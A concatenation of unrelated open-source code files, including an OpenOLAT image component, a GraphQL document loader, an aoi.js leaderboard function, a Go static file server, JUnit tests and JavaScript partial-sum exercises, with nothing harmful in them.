brokenUse(m, superMeth, clsRef, APIUse.METHOD_OVERRIDE);
}
} catch (SpoonException e) {
// A declaration cannot be resolved
// FIXME: deal with this issue in a fancier way?
}
}
@Override
public <T, A extends T> void visitCtAssignment(CtAssignment<T, A> assignment) {
visitExpAssignment(assignment.getAssignment());
}
@Override
public <T> void visitCtLocalVariable(CtLocalVariable<T> localVariable) {
visitExpAssignment(localVariable.getAssignment());
}
/**
* Visits an assignment expression and adds a new broken use if the class of the
* object is a subtype of the removed supertype.
*
* @param <T> type of the expression
* @param assignExpr assignment expression
*/
private <T> void visitExpAssignment(CtExpression<T> assignExpr) {
// FIXME: when dealing with interfaces this issue is not reported
// as a compilation error.
if (assignExpr != null) {
Set<CtTypeReference<?>> casts = new HashSet<>(assignExpr.getTypeCasts());
CtTypeReference<?> typeRef = assignExpr.getType();
for (CtTypeReference<?> cast : casts) {
if (supertypes.contains(cast) && typeRef.isSubtypeOf(clsRef))
brokenUse(assignExpr, cast, clsRef, APIUse.TYPE_DEPENDENCY);
}
}
}
}
|
<gh_stars>100-1000
/**
* OLAT - Online Learning and Training<br>
* http://www.olat.org
* <p>
* Licensed under the Apache License, Version 2.0 (the "License"); <br>
* you may not use this file except in compliance with the License.<br>
* You may obtain a copy of the License at
* <p>
* http://www.apache.org/licenses/LICENSE-2.0
* <p>
* Unless required by applicable law or agreed to in writing,<br>
* software distributed under the License is distributed on an "AS IS" BASIS, <br>
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. <br>
* See the License for the specific language governing permissions and <br>
* limitations under the License.
* <p>
* Copyright (c) since 2004 at Multimedia- & E-Learning Services (MELS),<br>
* University of Zurich, Switzerland.
* <hr>
* <a href="http://www.openolat.org">
* OpenOLAT - Online Learning and Training</a><br>
* This file has been modified by the OpenOLAT community. Changes are licensed
* under the Apache 2.0 license as the original file.
* <p>
*/
package org.olat.core.gui.components.image;
import java.io.File;
import java.util.Collections;
import java.util.UUID;
import org.olat.core.CoreSpringFactory;
import org.olat.core.commons.services.image.ImageService;
import org.olat.core.commons.services.image.Size;
import org.olat.core.commons.services.video.MovieService;
import org.olat.core.dispatcher.mapper.MapperService;
import org.olat.core.dispatcher.mapper.manager.MapperKey;
import org.olat.core.gui.UserRequest;
import org.olat.core.gui.components.AbstractComponent;
import org.olat.core.gui.components.ComponentRenderer;
import org.olat.core.gui.control.Disposable;
import org.olat.core.gui.render.ValidationResult;
import org.apache.logging.log4j.Logger;
import org.olat.core.logging.Tracing;
import org.olat.core.util.StringHelper;
import org.olat.core.util.UserSession;
import org.olat.core.util.WebappHelper;
import org.olat.core.util.vfs.LocalFileImpl;
import org.olat.core.util.vfs.VFSLeaf;
import org.olat.core.util.vfs.VFSMediaMapper;
/**
* Description: <br>
*
* @author <NAME>
*/
public class ImageComponent extends AbstractComponent implements Disposable {
private static final ComponentRenderer RENDERER = new ImageRenderer();
private static final Logger log = Tracing.createLoggerFor(ImageComponent.class);
private VFSLeaf media;
private String mimeType;
private String alt;
private String cssClasses;
private final MapperKey mapperUrl;
private final VFSMediaMapper mapper;
// optional in case of video: poster image
private VFSLeaf poster;
private MapperKey posterMapperUrl;
private VFSMediaMapper posterMapper;
private Size realSize;
private Size scaledSize;
private float scalingFactor;
private boolean divImageWrapper = true;
private boolean cropSelectionEnabled = false;
private boolean preventBrowserCaching = true;
private final MapperService mapperService;
/**
*
* @param usess The user session
* @param name The name of the component
*/
public ImageComponent(UserSession usess, String name) {
super(name);
mapper = new VFSMediaMapper();
String mapperId = UUID.randomUUID().toString();
mapperService = CoreSpringFactory.getImpl(MapperService.class);
mapperUrl = mapperService.register(usess, mapperId, mapper);
// optional poster frame for videos
posterMapper = new VFSMediaMapper();
posterMapperUrl = mapperService.register(usess, mapperId + "-poster", posterMapper);
// renderer provides own DOM ID
setDomReplacementWrapperRequired(false);
}
public String getAlt() {
return alt;
}
public void setAlt(String alt) {
this.alt = alt;
}
public boolean isPreventBrowserCaching() {
return preventBrowserCaching;
}
public void setPreventBrowserCaching(boolean preventBrowserCaching) {
this.preventBrowserCaching = preventBrowserCaching;
}
public boolean isDivImageWrapper() {
return divImageWrapper;
}
public void setDivImageWrapper(boolean divImageWrapper) {
this.divImageWrapper = divImageWrapper;
}
@Override
protected void doDispatchRequest(UserRequest ureq) {
//
}
public boolean isCropSelectionEnabled() {
return cropSelectionEnabled;
}
public void setCropSelectionEnabled(boolean enable) {
cropSelectionEnabled = enable;
}
public String getCssClasses() {
return cssClasses;
}
public void setCssClasses(String cssClasses) {
this.cssClasses = cssClasses;
}
/**
* @return Long
*/
public Size getScaledSize() {
return scaledSize;
}
public Size getRealSize() {
if(realSize == null) {
String suffix = getSuffix(getMimeType());
if(StringHelper.containsNonWhitespace(suffix)) {
if(suffix.equalsIgnoreCase("jpg") || suffix.equalsIgnoreCase("png") || suffix.equalsIgnoreCase("jpeg")) {
realSize = CoreSpringFactory.getImpl(ImageService.class).getSize(media, suffix);
} else if(suffix.equalsIgnoreCase("mp4") || suffix.equalsIgnoreCase("m4v") || suffix.equalsIgnoreCase("flv")) {
realSize = CoreSpringFactory.getImpl(MovieService.class).getSize(media, suffix);
}
}
}
return realSize;
}
public float getScalingFactor() {
return scalingFactor;
}
public VFSLeaf getMedia() {
return media;
}
public VFSLeaf getPoster() {
return poster;
}
@Override
public void dispose() {
if(mapper != null) {
mapperService.cleanUp(Collections.<MapperKey>singletonList(mapperUrl));
}
if(posterMapper != null) {
mapperService.cleanUp(Collections.<MapperKey>singletonList(posterMapperUrl));
}
}
/**
* Sets the image to be delivered. The image can be
* delivered several times. Don't set a resource which
* can be only send once.
*
* @param mediaResource
*/
public void setMedia(VFSLeaf media) {
setDirty(true);
this.media = media;
this.mimeType = null;
mapper.setMediaFile(media);
realSize = null;
}
public void setMedia(VFSLeaf media, String mimeType) {
setDirty(true);
this.media = media;
this.mimeType = mimeType;
mapper.setMediaFile(media);
realSize = null;
}
public void setMedia(File mediaFile) {
setDirty(true);
setMedia(new LocalFileImpl(mediaFile));
}
public void setPoster(VFSLeaf poster) {
setDirty(true);
this.poster = poster;
posterMapper.setMediaFile(poster);
}
public String getMapperUrl() {
return mapperUrl.getUrl();
}
public String getPosterMapperUrl() {
return posterMapperUrl.getUrl();
}
public String getMimeType() {
if(mimeType != null) {
return mimeType;
}
if(media == null) {
return null;
}
return WebappHelper.getMimeType(media.getName());
}
@Override
public ComponentRenderer getHTMLRendererSingleton() {
return RENDERER;
}
@Override
public void validate(UserRequest ureq, ValidationResult vr) {
super.validate(ureq, vr);
if(isCropSelectionEnabled()) {
vr.getJsAndCSSAdder().addRequiredStaticJsFile("js/jquery/cropper/cropper.min.js");
}
}
/**
* Call this method to display the image within a given box of width and
* height. The method does NOT manipulate the image itself, it does only
* adjust the images width and height tag. <br />
* The image will made displayed smaller, it will not enlarge the image since
* this always looks bad. The scaling is done in a way to get an image that is
* smaller than the maxWidth or smaller than the maxHeight, depending on whith
* of the sizes produce a smaller scaling factor. <br />
* To scale an image on the filesystem to another width and height, use the
* ImageHelper.scaleImage() method.
*
* @param maxWidth
* @param maxHeight
*/
public void setMaxWithAndHeightToFitWithin(int maxWidth, int maxHeight) {
if (media == null || !media.exists()) {
scalingFactor = Float.NaN;
realSize = null;
scaledSize = null;
return;
}
try {
Size size = getRealSize();
if(size == null) {
return;
}
int realWidth = size.getWidth();
int realHeight = size.getHeight();
// calculate scaling factor
scalingFactor = 1f;
if (realWidth > maxWidth) {
float scalingWidth = 1f / realWidth * maxWidth;
scalingFactor = (scalingWidth < scalingFactor ? scalingWidth : scalingFactor);
}
if (realHeight > maxHeight) {
float scalingHeight = 1f / realHeight * maxHeight;
scalingFactor = (scalingHeight < scalingFactor ? scalingHeight : scalingFactor);
}
realSize = new Size(realWidth, realHeight, false);
scaledSize = new Size(Math.round(realWidth * scalingFactor), Math.round(realHeight * scalingFactor), false);
setDirty(true);
} catch (Exception e) {
// log error, don't do anything else
log.error("Problem while setting image size to fit " + maxWidth + "x" + maxHeight + " for resource::" + media, e);
}
}
protected String getSuffix(String contentType) {
if(!StringHelper.containsNonWhitespace(contentType)) return null;
contentType = contentType.toLowerCase();
if(contentType.indexOf("jpg") >= 0 || contentType.indexOf("jpeg") >= 0) {
return "jpg";
}
if(contentType.indexOf("gif") >= 0) {
return "gif";
}
if(contentType.indexOf("png") >= 0) {
return "png";
}
if(contentType.indexOf("png") >= 0) {
return "png";
}
if(contentType.indexOf("m4v") >= 0) {
return "m4v";
}
if(contentType.indexOf("mp4") >= 0) {
return "mp4";
}
if(contentType.indexOf("webm") >= 0) {
return "webm";
}
if(contentType.indexOf("webp") >= 0) {
return "webp";
}
if(contentType.indexOf("flv") >= 0) {
return "flv";
}
return null;
}
} |
<reponame>smarulanda97/nextjs-spa5sentidos-v2<filename>src/utils/menuUtils.ts
import { Menu } from '@types-app/global';
type GetMenus = {
[key: string]: Menu;
};
export function normalizeMenus(menus: string[], data: any): GetMenus {
const normalizedData = {};
if (!menus.length || !data) {
return normalizedData;
}
menus.map((menu: string) => {
let menuObject = {};
const menuName = `${menu}Menu`;
if (menuName in data && Array.isArray(data[menuName]))
menuObject = data[menuName][0];
normalizedData[menuName] = menuObject;
});
return normalizedData;
}
|
<filename>packages/graphql-codegen-cli/src/loaders/documents/document-loader.ts
import { validate, GraphQLSchema, GraphQLError, specifiedRules } from 'graphql';
import { DocumentNode, Source, parse, concatAST, logger } from 'graphql-codegen-core';
import * as fs from 'fs';
import * as path from 'path';
import { extractDocumentStringFromCodeFile } from '../../utils/document-finder';
export const loadFileContent = (filePath: string): DocumentNode | null => {
if (fs.existsSync(filePath)) {
const fileContent = fs.readFileSync(filePath, 'utf8');
const fileExt = path.extname(filePath);
if (fileExt === '.graphql' || fileExt === '.gql') {
return parse(new Source(fileContent, filePath));
}
const foundDoc = extractDocumentStringFromCodeFile(fileContent);
if (foundDoc) {
return parse(new Source(foundDoc, filePath));
} else {
return null;
}
} else {
throw new Error(`Document file ${filePath} does not exists!`);
}
};
const effectiveRules = specifiedRules.filter((f: Function) => f.name !== 'NoUnusedFragments');
export const loadDocumentsSources = (
schema: GraphQLSchema,
filePaths: string[]
): DocumentNode | ReadonlyArray<GraphQLError> => {
const loadResults = filePaths.map(loadFileContent).filter(content => content);
const completeAst = concatAST(loadResults);
const errors = validate(schema, completeAst, effectiveRules);
return errors.length > 0 ? errors : completeAst;
};
|
<gh_stars>0
import HoverShadowBox from "./HoverShadowBox"
export default HoverShadowBox
|
<reponame>AkaruiDevelopment/aoi.js
const {
AoijsAPI,
DbdTsDb,
AoiMongoDb,
Promisify,
CustomDb,
} = require("../../../classes/Database.js");
module.exports = async (d) => {
const data = d.util.aoiFunc(d);
if (data.err) return d.error(data.err);
const [
variable,
type = "asc",
custom = `{top}) {username} : {value}`,
list = 10,
page = 1,
table = d.client.db.tables[0],
] = data.inside.splits;
const all = await d.client.db.all(table, variable.addBrackets(), 1);
let y = 0;
let value;
let content = [];
for (const Data of all.sort((x, y) => {
if (d.client.db instanceof AoijsAPI) {
if (d.client.db.type === "aoi.db")
return Number(y.value) - Number(x.value);
else return Number(y.data.value) - Number(x.data.value);
} else if (d.client.db instanceof DbdTsDb) {
return (
Number(y[variable.addBrackets()]) - Number(x[variable.addBrackets()])
);
} else if (d.client.db instanceof AoiMongoDb) {
return Number(y.value) - Number(x.value);
} else if (
d.client.db instanceof CustomDb ||
d.client.db instanceof Promisify
) {
return (
Number(
y.value ||
y[variable.addBrackets()] ||
(typeof y.Data === "object" ? y.Data.value : y.Data),
) -
Number(
x.value ||
x[variable.addBrackets()] ||
(typeof x.Data === "object" ? x.Data.value : x.Data),
)
);
}
})) {
let user;
if (d.client.db instanceof AoijsAPI) {
if (d.client.db.type === "aoi.db") value = Number(Data.value);
else value = Number(Data.data.value);
user = await d.util.getGuild(d, Data.key.split("_")[1]);
} else if (d.client.db instanceof DbdTsDb) {
value = Number(Data[variable.addBrackets()]);
user = await d.util.getGuild(d, Data.key.split("_")[0]);
} else if (d.client.db instanceof AoiMongoDb) {
value = Number(Data.value);
user = await d.util.getGuild(d, Data.key.split("_")[1]);
} else if (
d.client.db instanceof CustomDb ||
d.client.db instanceof Promisify
) {
value = Number(
Data.value ||
Data[variable.addBrackets()] ||
(typeof Data.Data === "object" ? Data.Data.value : Data.Data),
);
if (Data.key) {
const arr = Data.key.split("_");
user = await d.util.getGuild(d, arr.length === 2 ? arr[1] : arr[0]);
} else if (Data.id) {
const arr = Data.id.split("_");
user = await d.util.getGuild(d, arr.length === 2 ? arr[1] : arr[0]);
} else if (Data.ID) {
const arr = Data.ID.split("_");
user = await d.util.getGuild(d, arr.length === 2 ? arr[1] : arr[0]);
} else if (Data.Id) {
const arr = Data.Id.split("_");
user = await d.util.getGuild(d, arr.length === 2 ? arr[1] : arr[0]);
} else {
d.aoiError.fnError(
d,
"custom",
{},
"database Not Supported For LeaderBoard",
);
break;
}
}
if (user) {
y++;
let text = custom
.replace(`{top}`, y)
.replace("{id}", user.id)
.replace(`{name}`, user.name.removeBrackets())
.replace(`{value}`, value);
if (text.includes("{execute:")) {
let ins = text.split("{execute:")[1].split("}")[0];
const awaited = d.client.cmd.awaited.find((c) => c.name === ins);
if (!awaited)
return d.aoiError.fnError(
d,
"custom",
{ inside: data.inside },
` Invalid awaited command '${ins}' in`,
);
const CODE = await d.interpreter(
d.client,
{
guild: user,
channel: d.message.channel,
},
d.args,
awaited,
undefined,
true,
);
text = text.replace(`{execute:${ins}}`, CODE);
}
content.push(text);
}
}
if (type === "desc") content = content.reverse();
const px = page * list - list,
py = page * list;
data.result = content.slice(px, py).join("\n");
return {
code: d.util.setCode(data),
};
}; |
<reponame>eloymg/vulcan-checks
/*
Copyright 2020 Adevinta
*/
package main
import (
"fmt"
"log"
"net/http"
"os"
"strings"
)
type FileSystem struct {
fs http.FileSystem
}
func (fs FileSystem) Open(path string) (http.File, error) {
f, err := fs.fs.Open(path)
if err != nil {
return nil, err
}
s, err := f.Stat()
if s.IsDir() {
index := strings.TrimSuffix(path, "/") + "/index.html"
if _, err := fs.fs.Open(index); err != nil {
return nil, err
}
}
return f, nil
}
func main() {
if len(os.Args) < 2 {
fmt.Println("Usage: server DIRECTORY")
os.Exit(1)
}
fs := http.FileServer(FileSystem{http.Dir(os.Args[1])})
http.Handle("/", fs)
log.Println("Listening on :3000...")
err := http.ListenAndServe(":3000", nil)
if err != nil {
log.Fatal(err)
}
}
|
#!/bin/bash
DEPPACKS="flex bison libboost-all-dev verilator libtcl8.6 libreadline-dev tcl8.6-dev tcl-dev python3-venv libgmp3-dev libmpfr-dev libmpc-dev subversion libncurses-dev"
cd packages
apt-get --print-uris install $DEPPACKS | grep "^'" | sed "s/^'\([^']*\)'.*$/\1/g" > all.deps
for i in $(cat all.deps) ; do wget -nv $i ; done
|
<reponame>Vidhyadharantechdays/http-patch-jax-rs
/*
* The MIT License (MIT)
*
* Copyright (c) 2018 <NAME> < <EMAIL> >
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in all
* copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
* SOFTWARE.
*/
package com.labkit.test.personapi;
import com.vidhya.java.http.patch.jax.rs.entity.Person;
import com.vidhya.java.http.patch.jax.rs.entity.PersonUtil;
import static org.hamcrest.CoreMatchers.equalTo;
import static org.hamcrest.CoreMatchers.is;
import static org.hamcrest.CoreMatchers.not;
import javax.validation.constraints.AssertFalse;
import org.junit.Assert;
import org.junit.BeforeClass;
import org.junit.Test;
/**
*
* @author <NAME> (<EMAIL>)
*/
public class PersonTest {
static Person vidhya = null;
PersonUtil pu = new PersonUtil();
@BeforeClass
public static void intialize() {
vidhya = new Person();
vidhya.setAge(30);
vidhya.setEmail("<EMAIL>");
vidhya.setTwitter("vidhya03");
vidhya.setLocale("English");
vidhya.setName("<NAME>");
}
@Test
public void testPerson() {
String name = "<NAME>",
locale = "English", twitter = "vidhya03",
email = "<EMAIL>";
Integer age = 30;
Assert.assertThat("Verify age", age, is(equalTo(vidhya.getAge())));
Assert.assertThat("Verify Name", name, is(equalTo(vidhya.getName())));
Assert.assertThat("Verify Locale", locale, is(equalTo(vidhya.getLocale())));
Assert.assertThat("Verify Twitter", twitter, is(equalTo(vidhya.getTwitter())));
Assert.assertThat("Verify Email", email, is(equalTo(vidhya.getEmail())));
Assert.assertThat("Verify Person toString", "Person{" + "name=" + name
+ ", age=" + age + ", locale=" + locale + ", twitter=" + twitter
+ ", email=" + email + '}', is(equalTo(vidhya.toString())));
Person p = new Person();
Assert.assertThat("Hashcode should not equal", vidhya.hashCode(), not(p.hashCode()));
Assert.assertTrue("Object to same object equals ", p.equals(p));
Assert.assertFalse("Object to null equals ", p.equals(null));
Assert.assertFalse("Object to other class ", p.equals(new String("test")));
verifyEquals(vidhya, p);
p.setName(vidhya.getName());
verifyEquals(vidhya, p);
p.setLocale(vidhya.getLocale());
verifyEquals(vidhya, p);
p.setTwitter(vidhya.getTwitter());
verifyEquals(vidhya, p);
p.setEmail(vidhya.getEmail());
verifyEquals(vidhya, p);
p.setAge(vidhya.getAge());
// verifyEquals(vidhya, p);
Assert.assertTrue("Both object should be equal", vidhya.equals(p));
}
public void verifyEquals(Person v, Person x) {
Assert.assertFalse("Person x p to vidhya v ", x.equals(v));
Assert.assertFalse("Vidhya v to Person x", v.equals(x));
}
@Test
public void testPersonUtil() {
Person defaultPerson = PersonUtil.getDefaultPerson();
Person p = new Person();
p.setName("Vidhya");
p.setAge(29);
p.setLocale("en");
p.setTwitter("vidhya03");
p.setEmail("<EMAIL>");
Assert.assertThat("Default person ", defaultPerson, is(p));
}
@Test
public void testSearchPerson() {
Person defaultPerson = PersonUtil.getDefaultPerson();
Assert.assertThat("Search with name", true, is(defaultPerson.matchesAnyFileds("vidhya")));
Assert.assertThat("Search with twitter", true, is(defaultPerson.matchesAnyFileds("vidhya03")));
}
@Test
public void equalsNameTest(){
Person p = new Person();
p.setName(null);
p.setAge(29);
p.setLocale("en");
p.setTwitter("vidhya03");
p.setEmail("<EMAIL>");
vidhya.setName("Sameer");
boolean res = p.equals(vidhya);
}
@Test
public void equalsEmailTest(){
Person p = new Person();
p.setName("Sameer");
p.setAge(29);
p.setLocale("en");
p.setTwitter("vidhya03");
p.setEmail(null);
boolean res = p.equals(vidhya);
}
@Test
public void equalsLocaleTest(){
Person p = new Person();
p.setName("Sameer");
p.setAge(29);
p.setLocale(null);
p.setTwitter("vidhya03");
p.setEmail("<EMAIL>");
boolean res = p.equals(vidhya);
}
}
|
<gh_stars>100-1000
/*
* Copyright 2017-2021 original authors
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package io.micronaut.data.model.jpa.criteria.impl.predicate;
import io.micronaut.core.annotation.Internal;
import io.micronaut.data.model.PersistentProperty;
import io.micronaut.data.model.jpa.criteria.PersistentPropertyPath;
import io.micronaut.data.model.jpa.criteria.impl.PredicateVisitable;
/**
* Abstract predicate represented by a property path.
*
* @param <T> The property type
* @author <NAME>
* @since 3.2
*/
@Internal
public abstract class AbstractPersistentPropertyPredicate<T> extends AbstractPredicate implements PredicateVisitable {
protected final PersistentPropertyPath<T> persistentPropertyPath;
public AbstractPersistentPropertyPredicate(PersistentPropertyPath<T> persistentPropertyPath) {
this.persistentPropertyPath = persistentPropertyPath;
}
public final PersistentPropertyPath<T> getPropertyPath() {
return persistentPropertyPath;
}
public final PersistentProperty getProperty() {
return persistentPropertyPath.getProperty();
}
}
|
<reponame>craigbuckler/nodequiz<gh_stars>0
// utility functions
// clear children of DOM element
export function clear( node ) {
while ( node.lastChild ) node.removeChild( node.lastChild );
}
|
<filename>infrastructure/platform-api-gateway/src/main/resources/static/admin/scripts/portfolio.js
var Portfolio=function(){return{init:function(){$(".mix-grid").mixitup()}}}(); |
import numpy as np
from core.net_errors import NetConfigIndefined, IncorrectFactorValue
def initialize(net_object, factor=0.01):
if net_object.config is None:
raise NetConfigIndefined()
if abs(factor) > 1:
raise IncorrectFactorValue()
net_object.net = []
for l in range(1, len(net_object.config)):
net_object.net.append({
'w': np.random.uniform(-factor, factor, (net_object.config[l], net_object.config[l - 1] + 1)),
'o': np.zeros((net_object.config[l])),
})
|
package io.opensphere.core.util.swing;
import java.awt.Color;
import java.awt.Component;
import java.awt.Graphics;
import javax.swing.border.EtchedBorder;
/**
* The Class DynamicEtchedBorder.
*/
public class DynamicEtchedBorder extends EtchedBorder
{
/** The Constant serialVersionUID. */
private static final long serialVersionUID = 1L;
/** The Border color. */
private Color myBorderColor = Color.LIGHT_GRAY;
/** The Control component width. */
private final int myControlComponentWidth;
/**
* Instantiates a new dynamic etched border.
*
* @param borderColor the border color
* @param comp the comp
*/
public DynamicEtchedBorder(Color borderColor, Component comp)
{
super();
if (borderColor != null)
{
myBorderColor = borderColor;
}
myControlComponentWidth = comp.getPreferredSize().width;
}
@Override
public void paintBorder(Component c, Graphics g, int x, int y, int width, int height)
{
int w = width;
int h = height;
g.translate(x, y);
g.setColor(etchType == LOWERED ? getShadowColor(c) : getHighlightColor(c));
if (myControlComponentWidth == 0)
{
g.drawRect(0, 0, w - 2, h - 2);
}
else
{
// Left side
g.drawLine(0, h - 4, 0, 0);
// Top side
g.drawLine(0, 0, ComponentTitledBorder.LEFT_OFFSET - 1, 0);
g.drawLine(myControlComponentWidth + ComponentTitledBorder.LEFT_OFFSET + 2, 0, w - 3, 0);
// Bottom side
g.drawLine(0, h - 2, w - 2, h - 2);
// Right side
g.drawLine(w - 2, h - 2, w - 2, 0);
}
g.setColor(etchType == LOWERED ? getHighlightColor(c) : getShadowColor(c));
if (myControlComponentWidth == 0)
{
g.drawLine(1, h - 3, 1, 1);
g.drawLine(1, 1, w - 3, 1);
g.drawLine(0, h - 1, w - 1, h - 1);
g.drawLine(w - 1, h - 1, w - 1, 0);
}
else
{
// Left side
g.drawLine(1, h - 3, 1, 1);
// Top side
g.drawLine(1, 1, ComponentTitledBorder.LEFT_OFFSET - 1, 1);
g.drawLine(myControlComponentWidth + ComponentTitledBorder.LEFT_OFFSET + 2, 1, w - 3, 1);
// Bottom side
g.drawLine(0, h - 1, w - 1, h - 1);
// Right side
g.drawLine(w - 1, h - 1, w - 1, 0);
}
g.translate(-x, -y);
}
/**
* Sets the border highlight.
*
* @param highlighted on/off switch for the highlighting
*/
public void setHighlighted(boolean highlighted)
{
etchType = highlighted ? 0 : 1;
highlight = highlighted ? myBorderColor : null;
}
}
|
#! /bin/sh
# Copyright (C) 2001-2017 Free Software Foundation, Inc.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2, or (at your option)
# any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# Another test related to PR 279.
# Multiple DEPENDENCIES on conditionals.
# Please keep this in sync with sister test 'pr279.sh'.
#
# == Report ==
# When defining xxx_LDADD and xxx_DEPENDENCIES variables where the
# xxx_LDADD one contains values set in conditionals, automake will
# fail with messages like:
# foo_DEPENDENCIES was already defined in condition TRUE, ...
. test-init.sh
cat >> configure.ac << 'END'
AC_PROG_CC
AM_CONDITIONAL([FOOTEST], [false])
AC_OUTPUT
END
cat > Makefile.am << 'END'
if FOOTEST
foo_LDADD = zardoz
else
foo_LDADD = maude
endif
bin_PROGRAMS = foo
END
$ACLOCAL
$AUTOMAKE
grep '^@FOOTEST_TRUE@foo_DEPENDENCIES *= *zardoz$' Makefile.in
grep '^@FOOTEST_FALSE@foo_DEPENDENCIES *= *maude$' Makefile.in
:
|
<reponame>congleetea/fuse<filename>fuse_models/include/fuse_models/parameters/acceleration_2d_params.h<gh_stars>0
/*
* Software License Agreement (BSD License)
*
* Copyright (c) 2018, Locus Robotics
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
*
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above
* copyright notice, this list of conditions and the following
* disclaimer in the documentation and/or other materials provided
* with the distribution.
* * Neither the name of the copyright holder nor the names of its
* contributors may be used to endorse or promote products derived
* from this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
* LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
* CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
* ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
* POSSIBILITY OF SUCH DAMAGE.
*/
#ifndef FUSE_MODELS_PARAMETERS_ACCELERATION_2D_PARAMS_H
#define FUSE_MODELS_PARAMETERS_ACCELERATION_2D_PARAMS_H
#include <fuse_variables/acceleration_linear_2d_stamped.h>
#include <fuse_models/parameters/parameter_base.h>
#include <ros/node_handle.h>
#include <string>
#include <vector>
namespace fuse_models
{
namespace parameters
{
/**
* @brief Defines the set of parameters required by the Acceleration2D class
*/
struct Acceleration2DParams : public ParameterBase
{
public:
/**
* @brief Method for loading parameter values from ROS.
*
* @param[in] nh - The ROS node handle with which to load parameters
*/
void loadFromROS(const ros::NodeHandle& nh) final
{
indices = loadSensorConfig<fuse_variables::AccelerationLinear2DStamped>(nh, "dimensions");
nh.getParam("queue_size", queue_size);
getParamRequired(nh, "topic", topic);
getParamRequired(nh, "target_frame", target_frame);
}
int queue_size { 10 };
std::string topic {};
std::string target_frame {};
std::vector<size_t> indices;
};
} // namespace parameters
} // namespace fuse_models
#endif // FUSE_MODELS_PARAMETERS_ACCELERATION_2D_PARAMS_H
|
const arr = [ 1, 1, 5, 2, 6, 10 ];
let arr1 = [ 1, 7, 12, 6, 5, 10 ];
//--------------------------------------------------
const partialSum = ( arr ) => {
const output = [];
arr.forEach( ( num, i ) => {
if ( i === 0 ) {
output[ i ] = num;
} else {
output[ i ] = num + output[ i - 1 ];
}
} );
return output;
};
console.log( '------------------------------------------------partialSum------------------------------------------------' )
console.log( ' partialSum( arr )=[ 1, 1, 5, 2, 6, 10 ]: ', partialSum( arr ) );
console.log( ' partialSum( arr1 )=[ 1, 7, 12, 6, 5, 10 ]: ', partialSum( arr1 ) );
console.log( '------------------------------------------------partialSum------------------------------------------------' )
/*
------------------------------------------------partialSum------------------------------------------------
partialSum( arr )=[ 1, 1, 5, 2, 6, 10 ]: [ 1, 2, 7, 9, 15, 25 ]
partialSum( arr1 )=[ 1, 7, 12, 6, 5, 10 ]: [ 1, 8, 20, 26, 31, 41 ]
------------------------------------------------partialSum------------------------------------------------
*/
//!v---------------------THIS ONE IS NOT WOKRING AS EXPECTED-----------------------------------------------------
const partSum = ( array ) => {
let newArr = [];
array.reduce( ( acum, ele ) => {
let sum = acum + ele;
newArr.push( sum );
return acum + ele;
} );
return newArr;
};
console.log( '------------------------------------------------partSum------------------------------------------------' )
console.log( 'partSum(arr)=[ 1, 1, 5, 2, 6, 10 ]: ', partSum( arr ) );
console.log( 'partSum(arr1)=[ 1, 7, 12, 6, 5, 10 ]: ', partSum( arr1 ) );
console.log( '------------------------------------------------partSum------------------------------------------------' )
/*
------------------------------------------------partSum------------------------------------------------
partSum(arr)=[ 1, 1, 5, 2, 6, 10 ]: [ 2, 7, 9, 15, 25 ]
partSum(arr1)=[ 1, 7, 12, 6, 5, 10 ]: [ 8, 20, 26, 31, 41 ]
------------------------------------------------partSum------------------------------------------------
*/
//--------------------------------------------------------------
//! -----------------------------------------------------------------------------------------------------------------------------------------//
/*
------------------------------------------------partialSum------------------------------------------------
partialSum( arr )=[ 1, 1, 5, 2, 6, 10 ]: [ 1, 2, 7, 9, 15, 25 ]
